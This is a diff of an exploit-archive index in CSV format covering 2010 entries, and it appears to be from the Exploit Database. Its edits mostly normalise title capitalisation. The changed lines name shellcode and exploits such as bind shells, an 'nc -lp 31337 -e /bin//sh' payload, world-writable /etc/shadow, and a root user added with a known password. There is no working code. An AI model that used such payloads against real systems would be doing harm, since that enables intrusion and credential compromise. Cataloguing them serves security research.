Scripting",2010-06-09,Sid3^effects,multiple,webapps,0 @@ -12225,7 +12225,7 @@ id,file,description,date,author,platform,type,port 13870,platforms/ios/dos/13870.py,"iOS QuickOffice 3.1.0 - HTTP Method Remote Denial of Service",2010-06-14,"Nishant Das Patnaik",ios,dos,0 13871,platforms/ios/dos/13871.py,"iOS Impact PDF Reader 2.0 - POST Method Remote Denial of Service",2010-06-14,"Nishant Das Patnaik",ios,dos,0 13872,platforms/windows/dos/13872.txt,"SumatraPDF 1.1 - Denial of Service PoC",2010-06-14,"Matthew Bergin",windows,dos,0 -13875,platforms/solaris_x86/shellcode/13875.c,"Solaris/x86 - Sync() & reboot() & exit(0) shellcode (48 bytes)",2010-06-14,"Jonathan Salwan",solaris_x86,shellcode,0 +13875,platforms/solaris_x86/shellcode/13875.c,"Solaris/x86 - Sync() & reboot() & exit(0) Shellcode (48 bytes)",2010-06-14,"Jonathan Salwan",solaris_x86,shellcode,0 13876,platforms/windows/dos/13876.py,"File Sharing Wizard 1.5.0 - Buffer Overflow PoC",2010-06-15,m-1-k-3,windows,dos,0 13880,platforms/asp/webapps/13880.txt,"Smart ASP Survey - Cross-Site Scripting / SQL Injection",2010-06-15,"L0rd CrusAd3r",asp,webapps,0 13881,platforms/php/webapps/13881.txt,"Pre Job Board Pro - SQL Injection Authentication Bypass",2010-06-15,"L0rd CrusAd3r",php,webapps,0 @@ -12237,7 +12237,7 @@ id,file,description,date,author,platform,type,port 13887,platforms/windows/dos/13887.c,"Winplot 2010 - Buffer Overflow PoC",2010-06-15,"fl0 fl0w",windows,dos,0 13888,platforms/windows/dos/13888.c,"SasCam 2.6.5 - Remote HTTP Server Crash",2010-06-15,"fl0 fl0w",windows,dos,0 13889,platforms/php/webapps/13889.txt,"Nakid CMS 0.5.2 - Remote File Inclusion Exploit",2010-06-16,sh00t0ut,php,webapps,0 -13890,platforms/php/webapps/13890.txt,"EZPX Photoblog 1.2 beta - Remote File Inclusion Exploit",2010-06-16,sh00t0ut,php,webapps,0 +13890,platforms/php/webapps/13890.txt,"EZPX Photoblog 1.2 Beta - Remote File Inclusion Exploit",2010-06-16,sh00t0ut,php,webapps,0 13891,platforms/asp/webapps/13891.html,"AspTR EXtended - Cross-Site Request Forgery Bug",2010-06-16,FreWaL,asp,webapps,0 13892,platforms/php/webapps/13892.txt,"PHPAuctionSystem - Upload",2010-06-16,Sid3^effects,php,webapps,0 13893,platforms/php/webapps/13893.txt,"Nakid CMS 0.5.2 - (fckeditor) Arbitrary File Upload Exploit",2010-06-16,eidelweiss,php,webapps,0 @@ -12254,12 +12254,12 @@ id,file,description,date,author,platform,type,port 13905,platforms/windows/local/13905.py,"BlazeDVD 5.1 - (.plf) Stack Buffer Overflow Exploit (PoC) (Windows 7 ALSR/DEP Bypass)",2010-06-17,mr_me,windows,local,0 13906,platforms/novell/dos/13906.txt,"Netware - SMB Remote Stack Overflow PoC",2010-06-17,"laurent gaffie",novell,dos,139 13907,platforms/windows/local/13907.py,"Winamp 5.572 - Local Buffer Overflow Exploit (EIP & SEH DEP Bypass)",2010-06-17,TecR0c,windows,local,0 -13908,platforms/lin_x86-64/shellcode/13908.c,"Linux/x86-64 - Disable ASLR Security shellcode (143 bytes)",2010-06-17,"Jonathan Salwan",lin_x86-64,shellcode,0 +13908,platforms/lin_x86-64/shellcode/13908.c,"Linux/x86-64 - Disable ASLR Security Shellcode (143 bytes)",2010-06-17,"Jonathan Salwan",lin_x86-64,shellcode,0 13909,platforms/windows/local/13909.py,"Batch Audio Converter Lite Edition 1.0.0.0 - Stack Buffer Overflow (SEH)",2010-06-17,modpr0be,windows,local,0 -13910,platforms/lin_x86/shellcode/13910.c,"Linux/x86 - Polymorphic Bindport 31337 with setreuid (0_0) shellcode (131 bytes)",2010-06-17,gunslinger_,lin_x86,shellcode,0 +13910,platforms/lin_x86/shellcode/13910.c,"Linux/x86 - Polymorphic Bindport 31337 with setreuid (0_0) Shellcode (131 bytes)",2010-06-17,gunslinger_,lin_x86,shellcode,0 13911,platforms/php/webapps/13911.txt,"Live CMS - SQL Injection",2010-06-17,ahwak2000,php,webapps,0 13912,platforms/php/webapps/13912.txt,"Havij 1.10 - Persistent Cross-Site Scripting",2010-06-17,hexon,php,webapps,0 -13915,platforms/lin_x86-64/shellcode/13915.txt,"Linux/x86-64 - setuid(0) & chmod (_/etc/passwd__ 0777) & exit(0) shellcode (63 bytes)",2010-06-17,"Jonathan Salwan",lin_x86-64,shellcode,0 +13915,platforms/lin_x86-64/shellcode/13915.txt,"Linux/x86-64 - setuid(0) & chmod (_/etc/passwd__ 0777) & exit(0) Shellcode (63 bytes)",2010-06-17,"Jonathan Salwan",lin_x86-64,shellcode,0 13916,platforms/php/webapps/13916.txt,"PHP-Nuke Module print 6.0 - (print&sid) SQL Injection",2010-06-17,Gamoscu,php,webapps,0 13918,platforms/multiple/webapps/13918.txt,"Spring Framework - arbitrary code execution",2010-06-18,"Meder Kydyraliev",multiple,webapps,0 13919,platforms/windows/dos/13919.c,"Corel VideoStudio Pro X3 - (.mp4) Buffer Overflow",2010-06-18,"fl0 fl0w",windows,dos,0 @@ -12267,7 +12267,7 @@ id,file,description,date,author,platform,type,port 13921,platforms/windows/dos/13921.c,"PowerZip 7.21 - (Build 4010) Stack Buffer Overflow",2010-06-18,"fl0 fl0w",windows,dos,0 13922,platforms/php/webapps/13922.txt,"Joomla Component com_joomdocs - Cross-Site Scripting",2010-06-18,Sid3^effects,php,webapps,0 13923,platforms/php/webapps/13923.txt,"Joomla Component Answers 2.3beta - Multiple Vulnerabilities",2010-06-18,jdc,php,webapps,0 -13925,platforms/php/webapps/13925.txt,"joomla component ozio gallery 2 - Multiple Vulnerabilities",2010-06-18,jdc,php,webapps,0 +13925,platforms/php/webapps/13925.txt,"joomla component ozio Gallery 2 - Multiple Vulnerabilities",2010-06-18,jdc,php,webapps,0 13926,platforms/php/webapps/13926.txt,"joomla component listbingo 1.3 - Multiple Vulnerabilities",2010-06-18,jdc,php,webapps,0 13927,platforms/php/webapps/13927.txt,"MarketSaz - Remote file Upload",2010-06-18,NetQurd,php,webapps,0 13929,platforms/php/webapps/13929.txt,"Banner Management Script - SQL Injection",2010-06-18,"L0rd CrusAd3r",php,webapps,0 @@ -12284,7 +12284,7 @@ id,file,description,date,author,platform,type,port 13939,platforms/windows/dos/13939.pl,"Hacker Evolution Game: untold Mod Editor 2.00.001 - Buffer Overflow (PoC)",2010-06-19,gunslinger_,windows,dos,0 13940,platforms/windows/local/13940.pl,"Orbital Viewer 1.04 - (.ov) Local Universal Stack Overflow (SEH)",2010-06-19,Crazy_Hacker,windows,local,0 13942,platforms/windows/local/13942.pl,"MoreAmp - (.maf) Local Stack Buffer Overflow (SEH) (calc)",2010-06-20,Madjix,windows,local,0 -13943,platforms/lin_x86-64/shellcode/13943.c,"Linux/x86-64 - Add root user _shell-storm_ with password _leet_ shellcode (390 bytes)",2010-06-20,"Jonathan Salwan",lin_x86-64,shellcode,0 +13943,platforms/lin_x86-64/shellcode/13943.c,"Linux/x86-64 - Add root user _shell-storm_ with password _leet_ Shellcode (390 bytes)",2010-06-20,"Jonathan Salwan",lin_x86-64,shellcode,0 13944,platforms/php/webapps/13944.txt,"SimpleAssets - Authentication Bypass / Cross-Site Scripting",2010-06-20,"L0rd CrusAd3r",php,webapps,0 13945,platforms/php/webapps/13945.txt,"iBoutique - (page) SQL Injection / Cross-Site Scripting",2010-06-20,"L0rd CrusAd3r",php,webapps,0 13946,platforms/php/webapps/13946.txt,"Overstock Script - SQL Injection",2010-06-20,"L0rd CrusAd3r",php,webapps,0 @@ -12300,7 +12300,7 @@ id,file,description,date,author,platform,type,port 13958,platforms/windows/dos/13958.txt,"Sysax Multi Server < 5.25 - (SFTP Module) Multiple Commands Denial of Service Vulnerabilities",2010-06-21,leinakesi,windows,dos,0 13959,platforms/windows/dos/13959.c,"teamspeak 3.0.0-beta25 - Multiple Vulnerabilities",2010-06-21,"Luigi Auriemma",windows,dos,9987 14363,platforms/php/webapps/14363.txt,"Ad Network Script - Persistent Cross-Site Scripting",2010-07-14,Sid3^effects,php,webapps,0 -14359,platforms/php/webapps/14359.html,"Zenphoto CMS 1.3 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-07-14,10n1z3d,php,webapps,0 +14359,platforms/php/webapps/14359.html,"ZenPhoto CMS 1.3 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-07-14,10n1z3d,php,webapps,0 14360,platforms/multiple/remote/14360.txt,"Struts2/XWork < 2.2.0 - Remote Command Execution",2010-07-14,"Meder Kydyraliev",multiple,remote,0 13960,platforms/php/webapps/13960.html,"PHPWCMS 1.4.5 r398 - Cross-Site Request Forgery",2010-06-21,"Jeremiah Talamantes",php,webapps,0 13961,platforms/php/webapps/13961.txt,"Alpin CMS 1.0 - SQL Injection",2010-06-21,"Th3 RDX",php,webapps,0 @@ -12348,7 +12348,7 @@ id,file,description,date,author,platform,type,port 14011,platforms/php/webapps/14011.txt,"OpenEMR Electronic Medical Record Software 3.2 - Multiple Vulnerabilities",2010-06-24,"David Shaw",php,webapps,0 14012,platforms/multiple/dos/14012.txt,"Weborf HTTP Server - Denial of Service",2010-06-24,Crash,multiple,dos,80 14013,platforms/windows/remote/14013.txt,"UFO: Alien Invasion 2.2.1 - Arbitrary Code Execution",2010-06-24,"Jason Geffner",windows,remote,0 -14014,platforms/win_x86/shellcode/14014.pl,"Windows XP SP3 SPA - URLDownloadToFileA + CreateProcessA + ExitProcess shellcode (176+ bytes)",2010-06-24,d0lc3,win_x86,shellcode,0 +14014,platforms/win_x86/shellcode/14014.pl,"Windows XP SP3 SPA - URLDownloadToFileA + CreateProcessA + ExitProcess Shellcode (176+ bytes)",2010-06-24,d0lc3,win_x86,shellcode,0 14015,platforms/php/webapps/14015.txt,"2DayBiz Photo Sharing Script - SQL Injection (1)",2010-06-24,JaMbA,php,webapps,0 14016,platforms/php/webapps/14016.txt,"AdaptCMS 2.0.0 Beta - (init.php) Remote File Inclusion",2010-06-24,v3n0m,php,webapps,0 14017,platforms/php/webapps/14017.txt,"Joomla Component com_realtyna - Local File Inclusion",2010-06-24,MISTERFRIBO,php,webapps,0 @@ -12366,7 +12366,7 @@ id,file,description,date,author,platform,type,port 14036,platforms/windows/dos/14036.pl,"Geomau 7 - (.wg2) Local Buffer Overflow PoC",2010-06-24,Madjix,windows,dos,0 14037,platforms/windows/dos/14037.pl,"Plotwn 18 - (.wp2) Local Buffer Overflow PoC",2010-06-24,Madjix,windows,dos,0 14044,platforms/windows/local/14044.pl,"WM Downloader 2.9.2 - Stack Buffer Overflow",2010-06-25,Madjix,windows,local,0 -14116,platforms/arm/shellcode/14116.txt,"Linux/ARM - setuid(0) & kill(-1_ SIGKILL) shellcode (28 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0 +14116,platforms/arm/shellcode/14116.txt,"Linux/ARM - setuid(0) & kill(-1_ SIGKILL) Shellcode (28 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0 14046,platforms/windows/local/14046.py,"FieldNotes 32 5.0 - Buffer Overflow (SEH)",2010-06-25,TecR0c,windows,local,0 14047,platforms/php/webapps/14047.txt,"2DayBiz Matrimonial Script - SQL Injection / Cross-Site Scripting",2010-06-25,Sangteamtham,php,webapps,0 14048,platforms/php/webapps/14048.txt,"2DayBiz - Multiple SQL Injections",2010-06-25,Sangteamtham,php,webapps,0 @@ -12374,11 +12374,11 @@ id,file,description,date,author,platform,type,port 14050,platforms/php/webapps/14050.txt,"ARSC Really Simple Chat 3.3 - Remote File Inclusion / Cross-Site Scripting",2010-06-25,"Zer0 Thunder",php,webapps,0 14051,platforms/php/webapps/14051.txt,"2DayBiz B2B Portal Script - (selling_buy_leads1.php) SQL Injection",2010-06-25,r45c4l,php,webapps,0 14052,platforms/windows/shellcode/14052.c,"Windows - WinExec cmd.exe + ExitProcess Shellcode (195 bytes)",2010-06-25,RubberDuck,windows,shellcode,0 -14053,platforms/php/webapps/14053.txt,"snipe gallery Script - SQL Injection",2010-06-25,"dev!l ghost",php,webapps,0 +14053,platforms/php/webapps/14053.txt,"snipe Gallery Script - SQL Injection",2010-06-25,"dev!l ghost",php,webapps,0 14054,platforms/php/webapps/14054.txt,"Joomla Component JE Story Submit - SQL Injection",2010-06-25,"L0rd CrusAd3r",php,webapps,0 14055,platforms/php/webapps/14055.txt,"Joomla Component (com_sef) - Remote File Inclusion",2010-06-26,Li0n-PaL,php,webapps,0 14056,platforms/php/webapps/14056.txt,"Clicker CMS - Blind SQL Injection",2010-06-26,hacker@sr.gov.yu,php,webapps,0 -14057,platforms/php/webapps/14057.txt,"WordPress Cimy Counter Plugin - Exploit",2010-06-26,sebug,php,webapps,0 +14057,platforms/php/webapps/14057.txt,"Wordpress Cimy Counter Plugin - Exploit",2010-06-26,sebug,php,webapps,0 14058,platforms/aix/webapps/14058.html,"PHP-Nuke 8.2 - Remote Upload File Exploit",2010-06-26,Net.Edit0r,aix,webapps,0 14059,platforms/php/webapps/14059.txt,"Joomla JE Awd Song Component - Persistent Cross-Site Scripting",2010-06-26,Sid3^effects,php,webapps,0 14060,platforms/php/webapps/14060.txt,"Joomla JE Media Player Component - Local File Inclusion",2010-06-26,Sid3^effects,php,webapps,0 @@ -12404,11 +12404,11 @@ id,file,description,date,author,platform,type,port 14084,platforms/php/webapps/14084.txt,"Swoopo Clone 2010 - SQL Injection",2010-06-27,"L0rd CrusAd3r",php,webapps,0 14083,platforms/linux/dos/14083.pl,"Scite Text Editor 1.76 - Local Buffer Overflow (PoC)",2010-06-27,kmkz,linux,dos,0 14089,platforms/php/webapps/14089.txt,"PageDirector CMS - Multiple Vulnerabilities",2010-06-28,Tr0y-x,php,webapps,0 -14097,platforms/arm/shellcode/14097.c,"Linux/ARM - execve(_/bin/sh___/bin/sh__0) shellcode (30 bytes)",2010-06-28,"Jonathan Salwan",arm,shellcode,0 -14091,platforms/osx/remote/14091.py,"UFO: Alien Invasion 2.2.1 - Remote Code Execution (OSX)",2010-06-28,dookie,osx,remote,0 +14097,platforms/arm/shellcode/14097.c,"Linux/ARM - execve(_/bin/sh___/bin/sh__0) Shellcode (30 bytes)",2010-06-28,"Jonathan Salwan",arm,shellcode,0 +14091,platforms/osx/remote/14091.py,"UFO: Alien Invasion 2.2.1 (OSX) - Remote Code Execution",2010-06-28,dookie,osx,remote,0 14094,platforms/php/webapps/14094.txt,"Netartmedia iBoutique.MALL - SQL Injection",2010-06-28,Sid3^effects,php,webapps,0 14095,platforms/php/webapps/14095.txt,"I-net Multi User Email Script - SQL Injection",2010-06-28,Sid3^effects,php,webapps,0 -14096,platforms/php/webapps/14096.html,"CMSQlite & CMySQLite 1.3 - Cross-Site Request Forgery",2010-06-28,"ADEO Security",php,webapps,0 +14096,platforms/php/webapps/14096.html,"CMSQLite / CMySQLite 1.3 - Cross-Site Request Forgery",2010-06-28,"ADEO Security",php,webapps,0 14295,platforms/windows/dos/14295.html,"Microsoft - MSHTML.dll CTIMEOUTEVENTLIST::INSERTINTOTIMEOUTLIST Memory Leak",2010-07-09,"Ruben Santamarta ",windows,dos,0 14098,platforms/windows/local/14098.py,"GSM SIM Utility 5.15 - sms file Local SEH Buffer Overflow",2010-06-28,chap0,windows,local,0 14099,platforms/windows/dos/14099.py,"MemDb - Multiple Remote Denial of Service",2010-06-28,Markot,windows,dos,80 @@ -12426,9 +12426,9 @@ id,file,description,date,author,platform,type,port 14117,platforms/multiple/webapps/14117.txt,"CubeCart PHP (shipkey parameter) 4.3.x - SQL Injection",2010-06-29,"Core Security",multiple,webapps,80 30100,platforms/windows/remote/30100.html,"British Telecommunications Consumer Webhelper 2.0.0.7 - Multiple Buffer Overflow Vulnerabilities",2007-05-29,"Will Dormann",windows,remote,0 14118,platforms/multiple/webapps/14118.txt,"LIOOSYS CMS - 'news.php' SQL Injection",2010-06-29,GlaDiaT0R,multiple,webapps,80 -14119,platforms/lin_x86/shellcode/14119.c,"Linux/x86 - Polymorphic /bin/sh shellcode (116 bytes)",2010-06-29,gunslinger_,lin_x86,shellcode,0 +14119,platforms/lin_x86/shellcode/14119.c,"Linux/x86 - Polymorphic /bin/sh Shellcode (116 bytes)",2010-06-29,gunslinger_,lin_x86,shellcode,0 14274,platforms/php/webapps/14274.txt,"Joomla Music Manager Component - Local File Inclusion",2010-07-08,Sid3^effects,php,webapps,0 -14142,platforms/arm/shellcode/14142.c,"Linux/ARM - polymorphic chmod(_/etc/shadow__ 0777) shellcode (84 bytes)",2010-06-30,"Florian Gaultier",arm,shellcode,0 +14142,platforms/arm/shellcode/14142.c,"Linux/ARM - polymorphic chmod(_/etc/shadow__ 0777) Shellcode (84 bytes)",2010-06-30,"Florian Gaultier",arm,shellcode,0 14121,platforms/multiple/dos/14121.c,"Adobe Reader 9.3.2 - (CoolType.dll) Remote Memory Corruption / Denial of Service",2010-06-29,LiquidWorm,multiple,dos,0 14122,platforms/arm/shellcode/14122.txt,"Linux/ARM - chmod(_/etc/shadow__ 0777) Shellcode (35 bytes)",2010-06-29,"Florian Gaultier",arm,shellcode,0 14123,platforms/php/webapps/14123.txt,"WebDM CMS - SQL Injection",2010-06-29,"Dr.0rYX AND Cr3W-DZ",php,webapps,0 @@ -12438,7 +12438,7 @@ id,file,description,date,author,platform,type,port 14127,platforms/php/webapps/14127.txt,"Joomla Joomanager - SQL Injection",2010-06-30,Sid3^effects,php,webapps,0 14141,platforms/php/webapps/14141.pl,"Oxygen2PHP 1.1.3 - (member.php) SQL Injection",2010-06-30,Dante90,php,webapps,0 14132,platforms/php/webapps/14132.html,"webERP 3.11.4 - Multiple Vulnerabilities",2010-06-30,"ADEO Security",php,webapps,0 -14139,platforms/arm/shellcode/14139.c,"Linux/ARM - Disable ASLR Security shellcode (102 bytes)",2010-06-30,"Jonathan Salwan",arm,shellcode,0 +14139,platforms/arm/shellcode/14139.c,"Linux/ARM - Disable ASLR Security Shellcode (102 bytes)",2010-06-30,"Jonathan Salwan",arm,shellcode,0 14144,platforms/php/webapps/14144.txt,"Specialist Bed and Breakfast Website - SQL Injection",2010-06-30,JaMbA,php,webapps,0 14145,platforms/php/webapps/14145.txt,"Golf Club Site - SQL Injection",2010-06-30,JaMbA,php,webapps,0 14146,platforms/hardware/webapps/14146.txt,"Ubiquity Nanostation5 (Air OS) - Remote Command Execution",2010-06-30,emgent,hardware,webapps,80 @@ -12478,20 +12478,20 @@ id,file,description,date,author,platform,type,port 14186,platforms/php/webapps/14186.txt,"Family Connections Who is Chatting AddOn - Remote File Inclusion",2010-07-03,lumut--,php,webapps,0 14187,platforms/php/webapps/14187.txt,"Joomla eventcal Component 1.6.4 com_eventcal - Blind SQL Injection",2010-07-03,RoAd_KiLlEr,php,webapps,0 14188,platforms/php/webapps/14188.html,"Cpanel 11.25 - Cross-Site Request Forgery (Add FTP Account) Exploit",2010-07-03,G0D-F4Th3r,php,webapps,0 -14190,platforms/arm/shellcode/14190.c,"Linux/ARM - Polymorphic execve(_/bin/sh__ [_/bin/sh_]_ NULL); - XOR 88 encoded shellcode (78 bytes)",2010-07-03,"Jonathan Salwan",arm,shellcode,0 +14190,platforms/arm/shellcode/14190.c,"Linux/ARM - Polymorphic execve(_/bin/sh__ [_/bin/sh_]_ NULL); - XOR 88 encoded Shellcode (78 bytes)",2010-07-03,"Jonathan Salwan",arm,shellcode,0 14193,platforms/php/webapps/14193.c,"iscripts socialware 2.2.x - Multiple Vulnerabilities",2010-07-03,"Salvatore Fresta",php,webapps,0 14194,platforms/windows/remote/14194.cpp,"Sun Java Web Server 7.0 u7 - Remote Exploit",2010-07-03,dmc,windows,remote,0 14195,platforms/windows/remote/14195.html,"SasCam WebCam Server 2.6.5 - ActiveX SEH Overwrite",2010-07-03,blake,windows,remote,0 14208,platforms/php/webapps/14208.txt,"Sandbox 2.0.2 - Local File Inclusion",2010-07-04,saudi0hacker,php,webapps,0 14196,platforms/php/webapps/14196.txt,"Joomla SocialAds Component com_socialads - Persistent Cross-Site Scripting",2010-07-03,Sid3^effects,php,webapps,0 14197,platforms/php/webapps/14197.txt,"iScripts MultiCart 2.2 - Multiple SQL Injections",2010-07-03,"Salvatore Fresta",php,webapps,0 -14198,platforms/php/webapps/14198.txt,"Simple:Press WordPress Plugin 4.3.0 - SQL Injection",2010-07-04,"ADEO Security",php,webapps,0 +14198,platforms/php/webapps/14198.txt,"Simple:Press Wordpress Plugin 4.3.0 - SQL Injection",2010-07-04,"ADEO Security",php,webapps,0 14199,platforms/php/webapps/14199.txt,"phpaaCMS 0.3.1 - (show.php?id=) SQL Injection",2010-07-04,Shafiq-Ur-Rehman,php,webapps,0 14200,platforms/windows/remote/14200.html,"Registry OCX 1.5 - ActiveX Buffer Overflow",2010-07-04,blake,windows,remote,0 14201,platforms/php/webapps/14201.txt,"phpaaCMS - (list.php?id) SQL Injection",2010-07-04,CoBRa_21,php,webapps,0 14202,platforms/php/webapps/14202.txt,"iLister Listing Software - Local File Inclusion",2010-07-04,Sid3^effects,php,webapps,0 14203,platforms/php/webapps/14203.txt,"TCW PHP Album - Multiple Vulnerabilities",2010-07-04,"L0rd CrusAd3r",php,webapps,0 -14204,platforms/php/webapps/14204.txt,"Esoftpro Online Guestbook Pro - Multiple Vulnerabilities",2010-07-04,"L0rd CrusAd3r",php,webapps,0 +14204,platforms/php/webapps/14204.txt,"Esoftpro Online GuestBook Pro - Multiple Vulnerabilities",2010-07-04,"L0rd CrusAd3r",php,webapps,0 14205,platforms/php/webapps/14205.txt,"Esoftpro Online Photo Pro 2 - Multiple Vulnerabilities",2010-07-04,"L0rd CrusAd3r",php,webapps,0 14206,platforms/php/webapps/14206.txt,"Esoftpro Online Contact Manager - Multiple Vulnerabilities",2010-07-04,"L0rd CrusAd3r",php,webapps,0 14207,platforms/php/webapps/14207.txt,"Joomla Phoca Gallery Component (com_phocagallery) - SQL Injection",2010-07-04,RoAd_KiLlEr,php,webapps,0 @@ -12501,12 +12501,12 @@ id,file,description,date,author,platform,type,port 14213,platforms/php/webapps/14213.txt,"Joomla Component SEF (com_sef) - Local File Inclusion",2010-07-05,_mlk_,php,webapps,0 14214,platforms/php/webapps/14214.txt,"bbPress 1.0.2 - Cross-Site Request Forgery (Change Admin Password)",2010-07-05,saudi0hacker,php,webapps,0 14215,platforms/windows/local/14215.txt,"SasCam 2.7 - ActiveX Head Buffer Overflow",2010-07-05,blake,windows,local,0 -14216,platforms/lin_x86/shellcode/14216.c,"Linux/x86 - bind shell port 64533 shellcode (97 bytes)",2010-07-05,Magnefikko,lin_x86,shellcode,0 +14216,platforms/lin_x86/shellcode/14216.c,"Linux/x86 - bind shell port 64533 Shellcode (97 bytes)",2010-07-05,Magnefikko,lin_x86,shellcode,0 14217,platforms/php/webapps/14217.txt,"WikiWebHelp 0.28 - SQL Injection",2010-07-05,"ADEO Security",php,webapps,0 14218,platforms/linux/shellcode/14218.c,"Linux - Drop suid shell root in /tmp/.hiddenshell Polymorphic Shellcode (161 bytes)",2010-07-05,gunslinger_,linux,shellcode,0 14219,platforms/linux/shellcode/14219.c,"Linux - setreuid(0_0) execve(_/bin/sh__NULL_NULL) XOR Encoded Shellcode (62 bytes)",2010-07-05,gunslinger_,linux,shellcode,0 14250,platforms/php/webapps/14250.txt,"Joomla NeoRecruit (com_neorecruit Itemid) - Blind SQL Injection",2010-07-06,Sid3^effects,php,webapps,0 -14221,platforms/windows/shellcode/14221.html,"Windows - Safari JS JITed shellcode - exec calc (ASLR/DEP bypass)",2010-07-05,"Alexey Sintsov",windows,shellcode,0 +14221,platforms/windows/shellcode/14221.html,"Windows - Safari JS JITed Shellcode - exec calc (ASLR/DEP bypass)",2010-07-05,"Alexey Sintsov",windows,shellcode,0 14223,platforms/php/webapps/14223.txt,"Bs Scripts_Directory - SQL Injection / Authentication Bypass",2010-07-05,Sid3^effects,php,webapps,0 14224,platforms/php/webapps/14224.txt,"Bs Recipes_Website Script - SQL Injection / Authentication Bypass",2010-07-05,Sid3^effects,php,webapps,0 14225,platforms/php/webapps/14225.txt,"Bs Realtor_Web Script - SQL Injection",2010-07-05,Sid3^effects,php,webapps,0 @@ -12518,9 +12518,9 @@ id,file,description,date,author,platform,type,port 33410,platforms/php/webapps/33410.txt,"Drupal Sections 5.x-1.2/6.x-1.2 Module - HTML Injection",2009-12-16,"Justin C. Klein Keane",php,webapps,0 14232,platforms/php/webapps/14232.txt,"Joomla JPodium Component (com_jpodium) - SQL Injection",2010-07-05,RoAd_KiLlEr,php,webapps,0 14233,platforms/php/webapps/14233.txt,"Bs Auction Script - SQL Injection",2010-07-05,Sid3^effects,php,webapps,0 -14234,platforms/linux/shellcode/14234.c,"Linux - 125 bind port to 6778 XOR encoded polymorphic shellcode (125 bytes)",2010-07-05,gunslinger_,linux,shellcode,0 +14234,platforms/linux/shellcode/14234.c,"Linux - 125 bind port to 6778 XOR encoded polymorphic Shellcode (125 bytes)",2010-07-05,gunslinger_,linux,shellcode,0 14236,platforms/windows/dos/14236.txt,"Sun Java Web Server 7.0 u7 - Admin Interface Denial of Service",2010-07-06,muts,windows,dos,8800 -14235,platforms/linux/shellcode/14235.c,"Linux - _nc -lp 31337 -e /bin//sh_ polymorphic shellcode (91 bytes)",2010-07-05,gunslinger_,linux,shellcode,0 +14235,platforms/linux/shellcode/14235.c,"Linux - _nc -lp 31337 -e /bin//sh_ polymorphic Shellcode (91 bytes)",2010-07-05,gunslinger_,linux,shellcode,0 14237,platforms/php/webapps/14237.txt,"IBM Bladecenter Management - Multiple Web application vulnerabilities",2010-07-06,"Alexey Sintsov",php,webapps,0 14238,platforms/php/webapps/14238.txt,"BS Auction - SQL Injection",2010-07-06,"Easy Laster",php,webapps,0 14239,platforms/php/webapps/14239.txt,"Auto Dealer - SQL Injection PoC",2010-07-06,"Easy Laster",php,webapps,0 @@ -12533,7 +12533,7 @@ id,file,description,date,author,platform,type,port 14248,platforms/windows/remote/14248.py,"minerCPP 0.4b - Remote Buffer Overflow / Format String Attack Exploit",2010-07-06,l3D,windows,remote,0 14249,platforms/php/webapps/14249.txt,"Joomla com_autartimonial - SQL Injection",2010-07-06,Sid3^effects,php,webapps,0 14251,platforms/php/webapps/14251.txt,"PsNews 1.3 - SQL Injection",2010-07-06,S.W.T,php,webapps,0 -14254,platforms/osx/remote/14254.py,"EvoCam Web Server OS X - ROP Remote Exploit (Snow Leopard)",2010-07-06,d1dn0t,osx,remote,0 +14254,platforms/osx/remote/14254.py,"EvoCam Web Server OSX - ROP Remote Exploit (Snow Leopard)",2010-07-06,d1dn0t,osx,remote,0 14285,platforms/windows/webapps/14285.txt,"Outlook Web Access 2007 - Cross-Site Request Forgery",2010-07-08,"Rosario Valotta",windows,webapps,0 14255,platforms/php/webapps/14255.txt,"sandbox 2.0.3 - Multiple Vulnerabilities",2010-07-06,"Salvatore Fresta",php,webapps,0 14256,platforms/windows/local/14256.txt,"HP NNM 7.53 - ovwebsnmpsrv.exe Buffer Overflow (SEH)",2010-07-07,bitform,windows,local,0 @@ -12550,9 +12550,9 @@ id,file,description,date,author,platform,type,port 14269,platforms/windows/remote/14269.html,"FathFTP 1.7 - ActiveX Buffer Overflow",2010-07-08,blake,windows,remote,0 14270,platforms/php/webapps/14270.txt,"Zylone IT - Multiple Blind SQL Injection",2010-07-08,Callo,php,webapps,0 14271,platforms/php/webapps/14271.txt,"pithcms - (theme) Local/Remote File inclusion",2010-07-08,eidelweiss,php,webapps,0 -14272,platforms/osx/remote/14272.py,"UFO: Alien Invasion 2.2.1 - IRC Client Remote Code Execution - OS X Snow Leopard (ROP)",2010-07-08,d1dn0t,osx,remote,0 -14275,platforms/windows/remote/14275.txt,"Real Player 12.0.0.879 -",2010-07-08,webDEViL,windows,remote,0 -14276,platforms/linux/shellcode/14276.c,"Linux - Find all writeable folder in filesystem polymorphic shellcode (91 bytes)",2010-07-08,gunslinger_,linux,shellcode,0 +14272,platforms/osx/remote/14272.py,"UFO: Alien Invasion 2.2.1 - IRC Client Remote Code Execution - OSX Snow Leopard (ROP)",2010-07-08,d1dn0t,osx,remote,0 +14275,platforms/windows/remote/14275.txt,"Real Player 12.0.0.879 - Exploit",2010-07-08,webDEViL,windows,remote,0 +14276,platforms/linux/shellcode/14276.c,"Linux - Find all writeable folder in filesystem polymorphic Shellcode (91 bytes)",2010-07-08,gunslinger_,linux,shellcode,0 14277,platforms/php/webapps/14277.txt,"Inout Music 1.0 - Arbitrary File Upload",2010-07-08,SONIC,php,webapps,0 14278,platforms/php/webapps/14278.txt,"Inout Article Base Ultimate - Arbitrary File Upload",2010-07-08,SONIC,php,webapps,0 14279,platforms/php/webapps/14279.txt,"Inout Ad server Ultimate - Arbitrary File Upload",2010-07-08,SONIC,php,webapps,0 @@ -12573,12 +12573,12 @@ id,file,description,date,author,platform,type,port 14296,platforms/php/webapps/14296.txt,"Joomla QuickFAQ Component (com_quickfaq) - Blind SQL Injection",2010-07-09,RoAd_KiLlEr,php,webapps,0 14316,platforms/php/webapps/14316.pl,"PHP-Nuke 8.0 - (Web_Links Module) Blind SQL Injection",2010-07-10,yawn,php,webapps,0 14299,platforms/php/webapps/14299.txt,"CMS Contentia - 'news.php' SQL Injection",2010-07-09,GlaDiaT0R,php,webapps,0 -14305,platforms/lin_x86-64/shellcode/14305.c,"Linux/x86-64 - execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL) shellcode (49 bytes)",2010-07-09,10n1z3d,lin_x86-64,shellcode,0 +14305,platforms/lin_x86-64/shellcode/14305.c,"Linux/x86-64 - execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL) Shellcode (49 bytes)",2010-07-09,10n1z3d,lin_x86-64,shellcode,0 